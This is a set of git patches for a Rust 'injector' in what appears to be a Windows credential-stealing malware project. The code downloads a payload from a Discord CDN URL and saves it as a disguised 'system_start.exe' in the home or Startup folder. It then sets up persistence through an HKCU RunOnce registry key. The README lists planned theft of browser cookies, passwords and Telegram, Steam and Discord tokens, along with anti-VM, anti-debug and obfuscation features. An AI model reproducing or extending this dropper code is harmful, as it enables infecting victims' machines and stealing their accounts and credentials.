From 907babc3d48754d98db0786a76e859bb71ba4acb Mon Sep 17 00:00:00 2001
From: User <user@debian-BULLSEYE-live-builder-AMD64>
Date: Mon, 15 May 2023 13:26:30 +0200
Subject: [PATCH 1/4] Inspirations
---
 README.md | 6 ++++++
 1 file changed, 6 insertions(+)
diff --git a/README.md b/README.md
index 0a49126..208f5e6 100644
--- a/README.md
+++ b/README.md
@@ -26,3 +26,9 @@ Additional:
 - anti-VM, anti-debug
 - packing
 - obfuscation
+
+## Inspirations
+
+https://github.com/Abdulrhmanbk/discoon-malware/
+
+https://github.com/doenerium69/doenerium
-- GitLab
From 2bb928d95d3015ba87248b9d29c7e3174261f993 Mon Sep 17 00:00:00 2001
From: User <user@debian-BULLSEYE-live-builder-AMD64>
Date: Wed, 17 May 2023 14:31:26 +0200
Subject: [PATCH 2/4] Injector can download to home dir
---
 injector/Cargo.toml | 1 +
 injector/src/main.rs | 23 ++++++++++++++++++-----
 2 files changed, 19 insertions(+), 5 deletions(-)
diff --git a/injector/Cargo.toml b/injector/Cargo.toml
index 8e92751..a06d1e5 100644
--- a/injector/Cargo.toml
+++ b/injector/Cargo.toml
@@ -8,3 +8,4 @@ edition = "2021"
 [dependencies]
 reqwest = "*"
 tokio = { version = "1", features = ["full"] }
+directories = "5.0.1"
diff --git a/injector/src/main.rs b/injector/src/main.rs
index 63a2560..af69aed 100644
--- a/injector/src/main.rs
+++ b/injector/src/main.rs
@@ -1,4 +1,5 @@
 use std::{io::Cursor, env::var_os};
+use directories::UserDirs;
 type Result<T> = std::result::Result<T, Box<dyn std::error::Error + Send + Sync>>;
 async fn fetch_url(url: String, file_name: String) -> Result<()> {
@@ -11,9 +12,21 @@ async fn fetch_url(url: String, file_name: String) -> Result<()> {
 #[tokio::main]
 async fn main() {
- let test = var_os("APPDATA").unwrap();
- let appdata = test.to_str().unwrap();
- let right_path = "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\system_start.exe";
- let startup = format!("{}{}", appdata, right_path);
- fetch_url("URL HERE".to_string(), startup.to_string()).await.unwrap();
+
+ if true {
+ let user_dirs = UserDirs::new().unwrap() ;
+ let homedir = user_dirs.home_dir().to_str().unwrap();
+ let path = format!("{}{}", homedir, "\\system_start.exe");
+
+ fetch_url("https://cdn.discordapp.com/attachments/690308962696167469/1108306000726999111/a_suppr.txt".to_string(), path.to_string()).await.unwrap();
+
+ }else{
+ let test = var_os("APPDATA").unwrap();
+ let appdata = test.to_str().unwrap();
+ let right_path = "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\system_start.exe";
+ let path = format!("{}{}", appdata, right_path);
+
+ fetch_url("URL HERE".to_string(), path.to_string()).await.unwrap();
+
+ }
 }
-- GitLab
From a76eb38f72c29f4d4f290044f8d1d456ad7744cd Mon Sep 17 00:00:00 2001
From: User <user@debian-BULLSEYE-live-builder-AMD64>
Date: Thu, 18 May 2023 22:09:39 +0200
Subject: [PATCH 3/4] Injector adds payload path to registry
---
 injector/Cargo.toml | 1 +
 injector/src/main.rs | 11 +++++++++++
 2 files changed, 12 insertions(+)
diff --git a/injector/Cargo.toml b/injector/Cargo.toml
index a06d1e5..0f246f9 100644
--- a/injector/Cargo.toml
+++ b/injector/Cargo.toml
@@ -9,3 +9,4 @@ edition = "2021"
 reqwest = "*"
 tokio = { version = "1", features = ["full"] }
 directories = "5.0.1"
+winreg = "0.50.0"
diff --git a/injector/src/main.rs b/injector/src/main.rs
index af69aed..1e446d4 100644
--- a/injector/src/main.rs
+++ b/injector/src/main.rs
@@ -1,5 +1,8 @@
 use std::{io::Cursor, env::var_os};
 use directories::UserDirs;
+use std::path::Path;
+use winreg::enums::*;
+use winreg::RegKey;
 type Result<T> = std::result::Result<T, Box<dyn std::error::Error + Send + Sync>>;
 async fn fetch_url(url: String, file_name: String) -> Result<()> {
@@ -20,6 +23,14 @@ async fn main() {
 fetch_url("https://cdn.discordapp.com/attachments/690308962696167469/1108306000726999111/a_suppr.txt".to_string(), path.to_string()).await.unwrap();
+ let hkcu = RegKey::predef(HKEY_CURRENT_USER);
+ let reg_path = Path::new("Software")
+ .join("Microsoft")
+ .join("Windows")
+ .join("CurrentVersion")
+ .join("RunOnce");
+ let (key, _) = hkcu.create_subkey(®_path).unwrap();
+ key.set_value("System start", &path).unwrap();
 }else{
 let test = var_os("APPDATA").unwrap();
 let appdata = test.to_str().unwrap();
-- GitLab
From adf3926b28bac3d4c2391af70dbcebd72fcde2fd Mon Sep 17 00:00:00 2001
From: User <user@debian-BULLSEYE-live-builder-AMD64>
Date: Thu, 18 May 2023 22:18:46 +0200
Subject: [PATCH 4/4] Payload url in injector's download function
---
 README.md | 2 +-
 injector/src/main.rs | 7 ++++---
 2 files changed, 5 insertions(+), 4 deletions(-)
diff --git a/README.md b/README.md
index 208f5e6..4e094ba 100644
--- a/README.md
+++ b/README.md
@@ -22,7 +22,7 @@ Additional:
 - browser cookies
 - browser passwords
 - telegram, steam, discord tokens
-- persistence via regkey
+- persistence via regkey ✅
 - anti-VM, anti-debug
 - packing
 - obfuscation
diff --git a/injector/src/main.rs b/injector/src/main.rs
index 1e446d4..90756cc 100644
--- a/injector/src/main.rs
+++ b/injector/src/main.rs
@@ -5,7 +5,8 @@ use winreg::enums::*;
 use winreg::RegKey;
 type Result<T> = std::result::Result<T, Box<dyn std::error::Error + Send + Sync>>;
-async fn fetch_url(url: String, file_name: String) -> Result<()> {
+async fn download_payload(file_name: String) -> Result<()> {
+ let url = "https://cdn.discordapp.com/attachments/690308962696167469/1108306000726999111/a_suppr.txt".to_string();
 let response = reqwest::get(url).await?;
 let mut file = std::fs::File::create(file_name)?;
 let mut content = Cursor::new(response.bytes().await?);
@@ -21,7 +22,7 @@ async fn main() {
 let homedir = user_dirs.home_dir().to_str().unwrap();
 let path = format!("{}{}", homedir, "\\system_start.exe");
- fetch_url("https://cdn.discordapp.com/attachments/690308962696167469/1108306000726999111/a_suppr.txt".to_string(), path.to_string()).await.unwrap();
+ download_payload(path.to_string()).await.unwrap();
 let hkcu = RegKey::predef(HKEY_CURRENT_USER);
 let reg_path = Path::new("Software")
@@ -37,7 +38,7 @@ async fn main() {
 let right_path = "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\system_start.exe";
 let path = format!("{}{}", appdata, right_path);
- fetch_url("URL HERE".to_string(), path.to_string()).await.unwrap();
+ download_payload(path.to_string()).await.unwrap();
 }
 }
-- GitLab